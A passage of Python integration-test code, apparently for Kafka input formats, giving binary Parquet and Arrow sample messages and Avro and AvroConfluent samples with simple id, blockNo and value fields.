04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
b'\x50\x41\x52\x31\x15\x04\x15\xf0\x01\x15\x90\x01\x4c\x15\x1e\x15\x04\x12\x00\x00\x78\x04\x01\x00\x09\x01\x00\x02\x09\x07\x04\x00\x03\x0d\x08\x00\x04\x0d\x08\x00\x05\x0d\x08\x00\x06\x0d\x08\x00\x07\x0d\x08\x00\x08\x0d\x08\x00\x09\x0d\x08\x00\x0a\x0d\x08\x00\x0b\x0d\x08\x00\x0c\x0d\x08\x00\x0d\x0d\x08\x3c\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x14\x15\x18\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x24\x04\x05\x10\x32\x54\x76\x98\xba\xdc\x0e\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x1e\x19\x1c\x19\x5c\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\xa6\x06\x16\x1e\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc5\x01\x00\x00\x50\x41\x52\x31',
b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
],
},
'AvroConfluent': {
'data_sample': [
avro_confluent_message(schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
b''.join([avro_confluent_message(schema_registry_client,
{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1}) for id in range(1, 16)]),
avro_confluent_message(schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'extra_settings': ", format_avro_schema_registry_url='http://{}:{}'".format(
kafka_cluster.schema_registry_host,
8081
),
'supports_empty_value': True,
},
'Avro': {
# It seems impossible to send more than one avro file per a message
# because of nature of Avro: blocks go one after another
'data_sample': [
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
avro_message([{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1} for id in range(1, 16)]),
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'supports_empty_value': False,
},
'Arrow' : {
'data_sample' : [
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00